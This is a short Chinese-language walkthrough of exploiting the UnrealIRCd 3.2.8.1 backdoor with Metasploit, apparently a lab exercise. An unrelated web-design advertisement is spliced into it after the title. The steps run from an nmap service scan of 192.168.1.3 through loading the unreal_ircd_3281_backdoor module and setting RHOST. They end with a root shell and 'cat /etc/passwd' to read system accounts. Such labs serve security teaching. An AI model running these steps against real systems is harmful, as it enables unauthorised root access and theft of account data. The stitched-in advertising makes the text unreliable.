Metasploit溢出UnrealIRCd后门漏洞
10年的吉阳网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。营销型网站的优势是能够根据用户设备显示端的尺寸不同,自动调整吉阳建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。创新互联从事“吉阳网站设计”,“吉阳网站推广”以来,每个客户项目都认真落实执行。
利用UnrealIRCd后门漏洞,获取目标主机的root权限。
某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。
一、利用nmap工具扫描目标主机
1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
1.2在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。
1.3在终端中输入命令“msfconsole”,启动MSF终端。
1.4在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和***载荷。
1.5在终端中输入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
1.7在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。
1.8在终端中输入“exploit”, 开始向目标主机***,***成功后,建立shell会话。
1.9在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。